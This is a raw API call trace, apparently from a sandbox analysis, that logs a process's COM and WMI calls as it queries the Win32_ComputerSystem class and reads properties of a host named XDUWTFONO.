	[0267.285] WbemLocator:IUnknown:QueryInterface (in: This=0x58778c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade00 | out: ppvObject=0x5fade00*=0x5876ec) returned 0x0
	[0267.285] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5876ec, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fade08 | out: pCid=0x5fade08*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.285] WbemLocator:IUnknown:Release (This=0x5876ec) returned 0x3
	[0267.285] CoGetContextToken (in: pToken=0x5fade10 | out: pToken=0x5fade10) returned 0x0
	[0267.285] WbemLocator:IUnknown:AddRef (This=0x58778c) returned 0x4
	[0267.285] WbemLocator:IUnknown:QueryInterface (in: This=0x58778c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade84 | out: ppvObject=0x5fade84*=0x587774) returned 0x0
	[0267.285] WbemLocator:IUnknown:Release (This=0x58778c) returned 0x4
	[0267.286] WbemLocator:IRpcOptions:Query (in: This=0x587774, pPrx=0x58778c, dwProperty=2, pdwValue=0x5fadea8 | out: pdwValue=0x5fadea8) returned 0x80004002
	[0267.286] WbemLocator:IUnknown:Release (This=0x587774) returned 0x3
	[0267.286] WbemLocator:IUnknown:Release (This=0x58778c) returned 0x2
	[0267.286] CoGetContextToken (in: pToken=0x5fae284 | out: pToken=0x5fae284) returned 0x0
	[0267.286] CoGetContextToken (in: pToken=0x5fae244 | out: pToken=0x5fae244) returned 0x0
	[0267.286] WbemLocator:IUnknown:AddRef (This=0x58778c) returned 0x3
	[0267.286] WbemLocator:IUnknown:QueryInterface (in: This=0x58778c, riid=0x5fae2c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae2bc | out: ppvObject=0x5fae2bc*=0x608eb04) returned 0x0
	[0267.286] WbemLocator:IUnknown:Release (This=0x58778c) returned 0x3
	[0267.286] IUnknown:Release (This=0x608eb04) returned 0x2
	[0267.286] IUnknown:Release (This=0x608eb04) returned 0x1
	[0267.287] CoGetContextToken (in: pToken=0x5fae878 | out: pToken=0x5fae878) returned 0x0
	[0267.287] CoGetContextToken (in: pToken=0x5fae838 | out: pToken=0x5fae838) returned 0x0
	[0267.287] WbemLocator:IUnknown:AddRef (This=0x58778c) returned 0x2
	[0267.287] WbemLocator:IUnknown:QueryInterface (in: This=0x58778c, riid=0x5fae8b4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae8b0 | out: ppvObject=0x5fae8b0*=0x608eb04) returned 0x0
	[0267.287] WbemLocator:IUnknown:Release (This=0x58778c) returned 0x2
	[0267.287] IUnknown:AddRef (This=0x608eb04) returned 0x3
	[0267.287] IEnumWbemClassObject:Reset (This=0x608eb04) returned 0x0
	[0267.288] IUnknown:Release (This=0x608eb04) returned 0x2
	[0267.288] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0267.288] IUnknown:AddRef (This=0x608eb04) returned 0x3
	[0267.288] IEnumWbemClassObject:Next (in: This=0x608eb04, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x30c0cd4 | out: apObjects=0x4f1530*=0x608eb40, puReturned=0x30c0cd4*=0x1) returned 0x0
	[0267.291] IUnknown:QueryInterface (in: This=0x608eb40, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd78 | out: ppvObject=0x5fadd78*=0x608eb40) returned 0x0
	[0267.291] IUnknown:QueryInterface (in: This=0x608eb40, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd34 | out: ppvObject=0x5fadd34*=0x0) returned 0x80004002
	[0267.291] IUnknown:QueryInterface (in: This=0x608eb40, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc28 | out: ppvObject=0x5fadc28*=0x0) returned 0x80004002
	[0267.292] IUnknown:AddRef (This=0x608eb40) returned 0x3
	[0267.292] CoGetContextToken (in: pToken=0x5fadbc0 | out: pToken=0x5fadbc0) returned 0x0
	[0267.292] IUnknown:QueryInterface (in: This=0x608eb40, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x608eb44) returned 0x0
	[0267.292] IMarshal:GetUnmarshalClass (in: This=0x608eb44, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadbb0 | out: pCid=0x5fadbb0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0267.292] IUnknown:Release (This=0x608eb44) returned 0x3
	[0267.292] CoGetContextToken (in: pToken=0x5fadbb8 | out: pToken=0x5fadbb8) returned 0x0
	[0267.292] IUnknown:AddRef (This=0x608eb40) returned 0x4
	[0267.292] IUnknown:QueryInterface (in: This=0x608eb40, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc2c | out: ppvObject=0x5fadc2c*=0x0) returned 0x80004002
	[0267.292] IUnknown:Release (This=0x608eb40) returned 0x3
	[0267.293] IUnknown:Release (This=0x608eb40) returned 0x2
	[0267.293] CoGetContextToken (in: pToken=0x5fae018 | out: pToken=0x5fae018) returned 0x0
	[0267.293] CoGetContextToken (in: pToken=0x5fadfd8 | out: pToken=0x5fadfd8) returned 0x0
	[0267.293] IUnknown:AddRef (This=0x608eb40) returned 0x3
	[0267.293] IUnknown:QueryInterface (in: This=0x608eb40, riid=0x5fae054*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae050 | out: ppvObject=0x5fae050*=0x608eb40) returned 0x0
	[0267.293] IUnknown:Release (This=0x608eb40) returned 0x3
	[0267.293] IUnknown:Release (This=0x608eb40) returned 0x2
	[0267.293] IUnknown:Release (This=0x608eb40) returned 0x1
	[0267.294] IUnknown:Release (This=0x608eb04) returned 0x2
	[0267.294] CoGetContextToken (in: pToken=0x5fae8fc | out: pToken=0x5fae8fc) returned 0x0
	[0267.294] IUnknown:AddRef (This=0x608eb40) returned 0x2
	[0267.294] IWbemClassObject:Get (in: This=0x608eb40, wszName="__GENUS", lFlags=0, pVal=0x5fae978*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea2c*=0, plFlavor=0x5faea28*=0 | out: pVal=0x5fae978*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5faea2c*=3, plFlavor=0x5faea28*=64) returned 0x0
	[0267.294] IWbemClassObject:Get (in: This=0x608eb40, wszName="__PATH", lFlags=0, pVal=0x5fae958*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea10*=0, plFlavor=0x5faea0c*=0 | out: pVal=0x5fae958*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x5faea10*=8, plFlavor=0x5faea0c*=64) returned 0x0
	[0267.294] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0267.294] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9b0 | out: ppv=0x5fae9b0*=0x4a8dec) returned 0x0
	[0267.294] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9a8 | out: pAptType=0x5fae9a8*=1) returned 0x0
	[0267.295] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9ac | out: ppvObject=0x5fae9ac*=0x0) returned 0x80004002
	[0267.295] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0267.295] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4c8 | out: ppv=0x5fae4c8*=0x608def8) returned 0x0
	[0267.295] WbemDefPath:IUnknown:QueryInterface (in: This=0x608def8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae2f8 | out: ppvObject=0x5fae2f8*=0x0) returned 0x80004002
	[0267.295] WbemDefPath:IClassFactory:CreateInstance (in: This=0x608def8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae330 | out: ppvObject=0x5fae330*=0x608e8d8) returned 0x0
	[0267.295] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e8d8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0d4 | out: ppvObject=0x5fae0d4*=0x608e8d8) returned 0x0
	[0267.296] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e8d8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae090 | out: ppvObject=0x5fae090*=0x0) returned 0x80004002
	[0267.296] WbemDefPath:IUnknown:AddRef (This=0x608e8d8) returned 0x3
	[0267.296] CoGetContextToken (in: pToken=0x5fadf1c | out: pToken=0x5fadf1c) returned 0x0
	[0267.296] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e8d8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf04 | out: ppvObject=0x5fadf04*=0x61ca6a8) returned 0x0
	[0267.296] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x61ca6a8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf0c | out: pCid=0x5fadf0c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.296] WbemDefPath:IUnknown:Release (This=0x61ca6a8) returned 0x3
	[0267.297] CoGetContextToken (in: pToken=0x5fadf14 | out: pToken=0x5fadf14) returned 0x0
	[0267.297] WbemDefPath:IUnknown:AddRef (This=0x608e8d8) returned 0x4
	[0267.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e8d8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf88 | out: ppvObject=0x5fadf88*=0x0) returned 0x80004002
	[0267.297] WbemDefPath:IUnknown:Release (This=0x608e8d8) returned 0x3
	[0267.297] WbemDefPath:IUnknown:Release (This=0x608e8d8) returned 0x2
	[0267.297] WbemDefPath:IUnknown:Release (This=0x608def8) returned 0x0
	[0267.297] WbemDefPath:IUnknown:Release (This=0x608e8d8) returned 0x1
	[0267.298] CoGetContextToken (in: pToken=0x5fae7c4 | out: pToken=0x5fae7c4) returned 0x0
	[0267.298] CoGetContextToken (in: pToken=0x5fae784 | out: pToken=0x5fae784) returned 0x0
	[0267.298] WbemDefPath:IUnknown:AddRef (This=0x608e8d8) returned 0x2
	[0267.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e8d8, riid=0x5fae800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae7fc | out: ppvObject=0x5fae7fc*=0x608e8d8) returned 0x0
	[0267.298] WbemDefPath:IUnknown:Release (This=0x608e8d8) returned 0x2
	[0267.298] WbemDefPath:IUnknown:Release (This=0x608e8d8) returned 0x1
	[0267.298] CoGetContextToken (in: pToken=0x5fae844 | out: pToken=0x5fae844) returned 0x0
	[0267.298] CoGetContextToken (in: pToken=0x5fae804 | out: pToken=0x5fae804) returned 0x0
	[0267.298] WbemDefPath:IUnknown:AddRef (This=0x608e8d8) returned 0x2
	[0267.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e8d8, riid=0x5fae880*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae87c | out: ppvObject=0x5fae87c*=0x608e8d8) returned 0x0
	[0267.298] WbemDefPath:IUnknown:Release (This=0x608e8d8) returned 0x2
	[0267.299] WbemDefPath:IUnknown:AddRef (This=0x608e8d8) returned 0x3
	[0267.299] WbemDefPath:IWbemPath:SetText (This=0x608e8d8, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0267.299] WbemDefPath:IUnknown:Release (This=0x608e8d8) returned 0x2
	[0267.299] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5fae9e4 | out: puCount=0x5fae9e4*=0x2) returned 0x0
	[0267.299] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5fae9e0*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9e0*=0x17, pszText=0x0) returned 0x0
	[0267.299] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5fae9e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.299] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0267.299] IUnknown:AddRef (This=0x608eb04) returned 0x3
	[0267.299] IEnumWbemClassObject:Next (in: This=0x608eb04, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x30c0cd4 | out: apObjects=0x4f1530*=0x0, puReturned=0x30c0cd4*=0x0) returned 0x1
	[0267.305] IUnknown:Release (This=0x608eb04) returned 0x2
	[0267.305] CoGetContextToken (in: pToken=0x5fae8b4 | out: pToken=0x5fae8b4) returned 0x0
	[0267.305] WbemLocator:IUnknown:Release (This=0x58778c) returned 0x1
	[0267.305] IUnknown:Release (This=0x608eb04) returned 0x0
	[0267.308] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0267.308] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0267.308] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.308] IWbemClassObject:Get (in: This=0x608eb40, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c1b08*=0, plFlavor=0x30c1b0c*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x30c1b08*=8, plFlavor=0x30c1b0c*=64) returned 0x0
	[0267.308] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0267.308] IWbemClassObject:Get (in: This=0x608eb40, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c1b08*=8, plFlavor=0x30c1b0c*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x30c1b08*=8, plFlavor=0x30c1b0c*=64) returned 0x0
	[0267.308] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0267.309] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0267.309] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0267.309] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.309] IWbemClassObject:Get (in: This=0x608eb40, wszName="__CLASS", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c1bc0*=0, plFlavor=0x30c1bc4*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x30c1bc0*=8, plFlavor=0x30c1bc4*=64) returned 0x0
	[0267.309] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.309] IWbemClassObject:Get (in: This=0x608eb40, wszName="__CLASS", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c1bc0*=8, plFlavor=0x30c1bc4*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x30c1bc0*=8, plFlavor=0x30c1bc4*=64) returned 0x0
	[0267.309] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.309] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0267.309] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0267.309] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.309] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0267.309] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0267.309] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.310] IWbemClassObject:GetNames (in: This=0x608eb40, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5faea0c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5fae9d8 | out: pNames=0x5fae9d8*="\x01ƀ\x04") returned 0x0
	[0267.310] SafeArrayGetDim (psa=0x586458) returned 0x1
	[0267.310] SafeArrayGetDim (psa=0x586458) returned 0x1
	[0267.310] SafeArrayGetLBound (in: psa=0x586458, nDim=0x1, plLbound=0x5fae5d4 | out: plLbound=0x5fae5d4) returned 0x0
	[0267.310] IWbemClassObject:Get (in: This=0x608eb40, wszName="__GENUS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c25fc*=0, plFlavor=0x30c2600*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x30c25fc*=3, plFlavor=0x30c2600*=64) returned 0x0
	[0267.311] IWbemClassObject:Get (in: This=0x608eb40, wszName="__CLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c2630*=0, plFlavor=0x30c2634*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x30c2630*=8, plFlavor=0x30c2634*=64) returned 0x0
	[0267.311] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.311] IWbemClassObject:Get (in: This=0x608eb40, wszName="__SUPERCLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c2694*=0, plFlavor=0x30c2698*=0 | out: pVal=0x5faea04*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c2694*=8, plFlavor=0x30c2698*=64) returned 0x0
	[0267.311] IWbemClassObject:Get (in: This=0x608eb40, wszName="__DYNASTY", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c26bc*=0, plFlavor=0x30c26c0*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x30c26bc*=8, plFlavor=0x30c26c0*=64) returned 0x0
	[0267.311] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.311] IWbemClassObject:Get (in: This=0x608eb40, wszName="__RELPATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c2720*=0, plFlavor=0x30c2724*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x30c2720*=8, plFlavor=0x30c2724*=64) returned 0x0
	[0267.312] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0267.312] IWbemClassObject:Get (in: This=0x608eb40, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c27a4*=0, plFlavor=0x30c27a8*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x30c27a4*=3, plFlavor=0x30c27a8*=64) returned 0x0
	[0267.312] IWbemClassObject:Get (in: This=0x608eb40, wszName="__DERIVATION", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c27d8*=0, plFlavor=0x30c27dc*=0 | out: pVal=0x5faea04*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x586458*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x61ca6e8, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x30c27d8*=8200, plFlavor=0x30c27dc*=64) returned 0x0
	[0267.312] IWbemClassObject:Get (in: This=0x608eb40, wszName="__SERVER", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c2810*=0, plFlavor=0x30c2814*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x30c2810*=8, plFlavor=0x30c2814*=64) returned 0x0
	[0267.312] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0267.313] IWbemClassObject:Get (in: This=0x608eb40, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c285c*=0, plFlavor=0x30c2860*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x30c285c*=8, plFlavor=0x30c2860*=64) returned 0x0
	[0267.313] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0267.313] IWbemClassObject:Get (in: This=0x608eb40, wszName="__PATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c28ac*=0, plFlavor=0x30c28b0*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x30c28ac*=8, plFlavor=0x30c28b0*=64) returned 0x0
	[0267.313] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
